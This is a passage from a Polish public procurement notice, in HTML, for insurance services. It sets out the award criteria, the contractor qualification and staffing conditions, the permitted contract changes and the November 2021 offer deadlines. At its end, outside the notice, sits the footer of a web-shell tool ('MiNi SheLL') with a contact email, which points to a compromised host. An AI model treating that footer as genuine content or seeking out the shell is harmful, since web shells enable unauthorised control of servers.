usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przyznanie punktów zgodnie z kryteriami oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zakres pokrycia ryzyk fakultatywnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Warunek dot. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Wykonawca spełni warunek, jeżeli wykaże, że posiada zezwolenie właściwego organu na prowadzenie działalności ubezpieczeniowej zgodnie z ustawą z dnia 11 września 2015 roku o działalności ubezpieczeniowej i reasekuracyjnej (Dz. U. z 2019 poz. 381 z późn. zm.) obejmującej przedmiot zamówienia we wszystkich grupach ryzyk lub zaświadczenie właściwego organu państwowego, że Wykonawca prowadzi działalność ubezpieczeniową obejmującą przedmiot zamówienia we wszystkich grupach ryzyk – tylko w przypadku, jeżeli Wykonawca nie działa na podstawie zezwolenia.<br/><br/>2. Warunek dot. Zdolności technicznej lub zawodowej.<br/>Zamawiający określa niżej wymienione warunki:<br/>Stosownie do art. 60 oraz art. 121 ustawy Pzp, Zamawiający wymaga zatrudnienia przez Wykonawcę (lub Podwykonawcę - jeżeli Wykonawca powierza wykonanie części zamówienia podwykonawcy) przez cały okres realizacji zamówienia na podstawie umowy o pracę w rozumieniu art. 22 § 1 Kodeksu pracy, osób bezpośrednio wykonujących czynności (tzw. „osoby dedykowane do obsługi klienta”) polegające na: <br/>a) wystawianiu dokumentów ubezpieczeniowych;<br/>b) wystawianiu aneksów oraz dodatków do zawartych umów ubezpieczenia;<br/>c) wystawianiu dokumentów dotyczących płatności składki;<br/>d) udziale w spotkaniach z Zamawiającym;<br/>e) prowadzeniu kompleksowej obsługi na rzecz Zamawiającego w zakresie dotyczącym przedmiotu umowy, w tym m.in.: obsługi administracyjnej zawartych umów, ich rozliczania, bieżącego kontaktu z Zamawiającym celem wyjaśniania wszelkich wątpliwości dotyczących realizacji przedmiotu umowy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Dotyczących wymaganych uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej. <br/>Wykonawca spełni warunek, jeżeli wykaże, że posiada zezwolenie właściwego organu na prowadzenie działalności ubezpieczeniowej zgodnie z ustawą z dnia 11 września 2015 roku o działalności ubezpieczeniowej i reasekuracyjnej (Dz. U. z 2019 poz. 381 z późn. Zm.) obejmującej przedmiot zamówienia we wszystkich grupach ryzyk lub zaświadczenie właściwego organu państwowego, że Wykonawca prowadzi działalność ubezpieczeniową obejmującą przedmiot zamówienia we wszystkich grupach ryzyk – tylko w przypadku, jeżeli Wykonawca nie działa na podstawie zezwolenia.<br/>2. Dotyczących zdolności technicznej lub zawodowej:<br/>Stosownie do art. 60 oraz art. 121 ustawy Pzp, Zamawiający wymaga zatrudnienia przez Wykonawcę (lub Podwykonawcę - jeżeli Wykonawca powierza wykonanie części zamówienia podwykonawcy) przez cały okres realizacji zamówienia na podstawie umowy o pracę w rozumieniu art. 22 § 1 Kodeksu pracy, osób bezpośrednio wykonujących czynności (tzw. „osoby dedykowane do obsługi klienta”) polegające na: <br/>a) wystawianiu dokumentów ubezpieczeniowych;<br/>b) wystawianiu aneksów oraz dodatków do zawartych umów ubezpieczenia;<br/>c) wystawianiu dokumentów dotyczących płatności składki;<br/>d) udziale w spotkaniach z Zamawiającym;<br/>e) prowadzeniu kompleksowej obsługi na rzecz Zamawiającego w zakresie dotyczącym przedmiotu umowy, w tym m.in.: obsługi administracyjnej zawartych umów, ich rozliczania, bieżącego kontaktu z Zamawiającym celem wyjaśniania wszelkich wątpliwości dotyczących realizacji przedmiotu umowy. <br/><br/>Wykonawca spełni warunek, jeżeli przedstawi wykaz osób, skierowanych do realizacji zamówienia publicznego, odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - Załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość dokonania zmian w zawartej umowie ubezpieczenia. Dopuszczane zmiany dotyczą:<br/><br/>1.	Terminu realizacji zamówienia, w tym wcześniejszego rozwiązania umowy na skutek okoliczności, których Zamawiający nie mógł przewidzieć udzielając zamówienia lub przedłużenia umowy do czasu zawarcia w postępowaniu o udzielenie zamówienia nowej umowy.<br/><br/>2.	Realizacji dodatkowych i niezbędnych usług od dotychczasowego Wykonawcy po spełnieniu łącznie przesłanek określonych w art. 144 ust.1 pkt. 2 a-c ustawy.<br/><br/>3.	Sytuacji, gdy spełnione zostaną łącznie przesłanki określone w art. 144 ust.1 pkt. 3 a-b ustawy.<br/><br/>4.	Zmiany Wykonawcy, któremu Zamawiający udzielił zamówienia i zastąpienia go nowym Wykonawcą po spełnieniu jednej z przesłanek określonych w art. 144 ust.1 pkt. 4 a-c ustawy.<br/><br/>5.	Zmian, niezależnie od ich wartości, które nie są istotne w rozumieniu art. 144 ust. 1e ustawy.<br/><br/>6.	Zmian, których łączna wartość jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 i jest mniejsza od 10% wartości zamówienia określonej pierwotnie w umowie.<br/><br/>7.	Jednoznacznych postanowień umownych, pod warunkiem iż nie wpłyną one na ogólny charakter umowy oraz warunki ustalone w postępowaniu przetargowym, a wprowadzona zmiana nie naruszy równowagi ekonomicznej umowy oraz nie zmieni zakresu świadczeń i zobowiązań.<br/><br/>8.	Nastąpi zmiana wysokości wynagrodzenia należnego Wykonawcy w przypadku zmiany:<br/>a.	stawki podatku od towarów i usług;<br/>b.	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę;<br/>c.	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne;<br/>zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (art. 142 ust. 5 pzp) Zmiana z pkt 8) może być dokonana na wniosek Wykonawcy, który w sposób należyty wykaże okoliczności mające wpływ na koszty wykonania zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-24 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://icimb.bip-e.pl/icm/zamowienia-publiczne/aktualne-postepowania/11,Przetargi-ponizej-progow-unijnych.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-24 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com